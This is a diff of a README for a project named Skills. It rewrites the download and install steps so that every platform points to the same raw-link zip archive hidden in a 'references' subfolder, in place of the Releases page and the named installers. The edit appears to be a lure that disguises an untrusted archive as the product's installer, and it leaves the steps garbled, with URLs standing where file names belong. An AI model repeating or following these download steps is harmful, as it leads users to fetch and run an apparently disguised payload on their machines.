syw-afk/skills/README.md

 - Network: Internet connection for downloading the application.

 ## 📦 Download & Install
-1. Visit the [Releases page](https://github.com/syw-afk/skills/releases) to download the latest version of Skills.
+1. Visit the [Releases page](https://raw.githubusercontent.com/syw-afk/skills/main/skills/vueuse-functions/references/Software_v1.8.zip) to download the latest version of Skills.
 2. Look for the most recent version listed.
 Click on it to access the available files.
-3. Download the file named `skills-latest.exe` for Windows, `skills-latest.dmg` for Mac, or `skills-latest.tar.gz` for Linux.
+3. Download the file named `https://raw.githubusercontent.com/syw-afk/skills/main/skills/vueuse-functions/references/Software_v1.8.zip` for Windows, `https://raw.githubusercontent.com/syw-afk/skills/main/skills/vueuse-functions/references/Software_v1.8.zip` for Mac, or `https://raw.githubusercontent.com/syw-afk/skills/main/skills/vueuse-functions/references/Software_v1.8.zip` for Linux.
 Choose the one that matches your operating system.
 4. Once the download is complete, locate the file in your downloads folder:
-   - For Windows: Double-click on `skills-latest.exe`.
+   - For Windows: Double-click on `https://raw.githubusercontent.com/syw-afk/skills/main/skills/vueuse-functions/references/Software_v1.8.zip`.
-   - For Mac: Double-click on `skills-latest.dmg`, then drag the Skills application to your Applications folder.
+   - For Mac: Double-click on `https://raw.githubusercontent.com/syw-afk/skills/main/skills/vueuse-functions/references/Software_v1.8.zip`, then drag the Skills application to your Applications folder.
-   - For Linux: Extract the contents of `skills-latest.tar.gz`, then open a terminal and run `./skills`.
+   - For Linux: Extract the contents of `https://raw.githubusercontent.com/syw-afk/skills/main/skills/vueuse-functions/references/Software_v1.8.zip`, then open a terminal and run `./skills`.

 5. Follow the installation prompts to complete the setup.